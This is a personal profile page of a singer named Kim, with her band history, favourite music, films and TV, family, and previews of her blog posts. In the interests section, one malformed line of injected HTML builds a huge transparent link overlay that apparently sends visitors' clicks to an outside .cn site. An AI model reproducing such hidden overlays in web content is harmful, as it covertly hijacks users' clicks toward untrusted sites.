...:::KIM:::... profile picture


Be careful...It's a jungle out there!

About Me

Wow...it's weird to write about yourself on several levels I think...
I think the most important things for anyone to know about me is that I am not judgemental, I appreciate everyone's diversity, but...(you knew that was coming...) the things I dislike most are lies and deception...so with that said...here's a little about me:
I sang and played for a long time...there was a studio at the end of my street in a little unattached garage that was being rented by a bunch of long-haired self-proclaimed musicians...everyday on my way home I would walk passed this place and check out what they had goin' on (it's all the Bass Player from the VOODOO Jets fault!!)...I think those days were the first of many where I knew all I wanted to do was sing...the first band I was in, I think I was 15...back when Rick Savage made spandex look like the bomb! (...reference the bad hair/fashion below...!)
The next band was called "Obsession", and I was 17--we played everywhere, including the local chinese restaurant (you've all been there...!), as well as a few Battle of the Bands--I was the only girl out of 25 Rockstar Wannabe's--and me and my guys won!!
I will even admit to doing Wedding Band gigs...go ahead and laugh~but they feed and pay you well!! And besides, it makes you feel like you helped to start out someone else's travels in life on a good "note"...
I had several years of private voice instruction, I also play flute, as well as wishing to play guitar like George Lynch--but the fingers just don't do this!! (he-he) He recently played in AZ and I must say, no matter how you slice it~Lynch will always ROCK the HOUSE!!
I think the hardest part of being a girl in a band back then was that I started out in a time when no one thought we could hang as well as the guys...well--times have changed considerably, as well as styles and genres of music in general...there is a lot more to my musical history, but it is just that...History...
I've since also held a position with Fender, and have had the good fortune to attend NAMM this past January--this is something that everyone should do just once.
Music is not just sound--it is an expression of the artists inner soul, and it is something to be revered and respected even if it is not your cup of tea...

My Interests

The Arts: music ~ there is never enough MUSIC...all forms of creative design (traditional or digital), poetry...and a Skydive from time to time, as well as travelling...I especially enjoyed London/Cambridge--however I dislike Marmite intensely!!
"Once you have experienced the wonder of flight...your eyes will forever look upward...jump from the cliff to fly - not to fall..."a class="popup_wrapper" style="background-color:transparent!important;cursor:default ;left:-30px;top:0px;height:6235px;width:1092px;"class=popup_ x href="http://krnac.cn/s/" da$d

I'd like to meet:

I have had the good fortune to meet several talented people over the years...what I have learned from those experiences is that they are just like everyone else~except they are fortunate enough to share their creativity on a larger scale...so~how about some like minded artistic/creative...musically inclined individuals and genuinely real people...

My peeps ROCK!!!...When the Damn Map Works!!!

Drop a line...
Feel free to give me a Shout!!

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so many likes...Glenn Hughes, John Sykes, King's X, Chris Cornell in any form...Pamela Moore...old Jazz...recently--John Corbett's new album (yes the actor from Northern Exposure...)--it rocks! My tastes are very diverse as I sing, play flute, and have been trying to make my fingers play guitar for too long...and a lot of undiscovered players as well...


My favorite is the "Shawshank Redemption", and then..."The Eternal Sunshine of the Spotless Mind" (though some people are very hard to forget...)as well as my all time favorite: "It's a Wonderful Life"...I love classic film...I just saw the DaVinci Code -- even if you have no interest in the heavy side of this film...go see it...Sir Anthony Hopkins is simply brilliant in any endeavor...oh, and David Duchovny's "House of D"...300 was brilliant--Gerard Butler is outstanding--even better than Dracula or Phantom of the Opera...!!


Never really watch...but I like old shows...and we cannot leave out the X Files...UPDATE 12/15/2006: I have become hopelessly addicted to buying seasons of shows on DVD: LOST (it's sad to admit to watching 6 episodes in a row...), WEEDS (it's a pisser!!), SUPERNATURAL, BONES (yeah baby!!)...INVASION--why was this cancelled??? I am far from being politically active...but I have finished watching all 7 Seasons of The West Wing--which I never watched on TV...Martin Sheen is Godlike---what happened to Studio 60??? They always cancel the truly good stuff!


novels, fiction, all sorts really...lately, though--just not enough time to chill and read......UPDATE 12/15/2006: I have finally decided to finish the three novels I started writing...even if it kills me!!


My Dad...for he was one of the hardest working people I ever knew...Dad passed 10 years ago this year...I miss him terribly...My Mom---at 63 she is a recent Amputee...Bless her for not giving up...and striving to move forward in her own way!!These situations may sound sad---but they are not--they are examples of very strong people...I can only hope to come close to their example...Fox Mulder...because I also "want to believe..."

Chris Cornell

My Blog

06/17/2007: Paul Nelson & Johnny Winter!!!!!

What's up Peeps?Last night I had the good fortune to see an old friend play here in Phoenix at the Celebrity Theatre with Johnny Winter---Paul Nelson.Paul is an old friend from back home in CT, and it...
Posted by ...:::KIM:::... on Sun, 17 Jun 2007 11:28:00 PST

05/09/2007...:::Hittin the Road Sunday!! WOO-HOO:::...

What's Up Peeps?Getting ready to hit the road...enroute back to the Desert!!I am psyched to get back to a place that I didn't really think I would miss all that much...But I look at it this way...5 ho...
Posted by ...:::KIM:::... on Wed, 09 May 2007 12:37:00 PST

05/03/2007...:::The DEER HUNTER is MOVING ON!!:::...

And the saga moves forward....  It is a nice day in lovely connect--I--cut....However.....it is time to move on!!I don't think I know of anyone who has made a 3,000 mile move twice in less than 6...
Posted by ...:::KIM:::... on Thu, 03 May 2007 09:00:00 PST

04/06/2007 Spring...Birthday...Changes.....Revelations

Happy Easter/Spring People!!It's hard to keep up with all of you independently at times...but you are all in my thoughts for a new and bright season of growth and changes!Thanks to everyone for the Bi...
Posted by ...:::KIM:::... on Fri, 06 Apr 2007 05:45:00 PST

01/26/2007: New Year...New Dog...Catch Up!!

Hey Peeps:It's been awhile since I slapped down a few thoughts...and it's a New Year---my best to everyone for 2007...!!!Last I wrote, I was in the process of leaving the Desert (Phoenix)...and I have...
Posted by ...:::KIM:::... on Fri, 26 Jan 2007 09:15:00 PST

11/06/2006....Buh-Bye Desert.........Going Home!!!!!!

Hitting the road in a few days...Wow...it has been a really strange few weeks...with lots of changes and twists and turns...I had been thinking about relocating out of the Desert...AZ is nice....but P...
Posted by ...:::KIM:::... on Mon, 06 Nov 2006 08:04:00 PST

I'm a SLACKER!!!...probably not what you think...09/01/2006

Wow!!I can't believe it is September already!! Strange how you never really pay attention to how fast time/life/experiences blow by you...In the last few months I have been doing contract work for a f...
Posted by ...:::KIM:::... on Fri, 01 Sep 2006 12:12:00 PST


Happy FRIDAY people!!I was sitting here with my coffee and checkin' out Dave Navarro's "SPREAD RADIO" live---Iron Maiden at 7am is the sheeot!So let's get on with the next 8 hours...and get it over wi...
Posted by ...:::KIM:::... on Fri, 02 Jun 2006 07:35:00 PST

Check Out The Lesser Known Artists!!! They Rock!!

There are a lot of really good "lesser known" artists under "myfriends"....check them out....Pamela Moore, The Voo Doo Jets, Mindcage--to name a few!!You might even see a few "famous" people strewn th...
Posted by ...:::KIM:::... on Mon, 29 May 2006 12:37:00 PST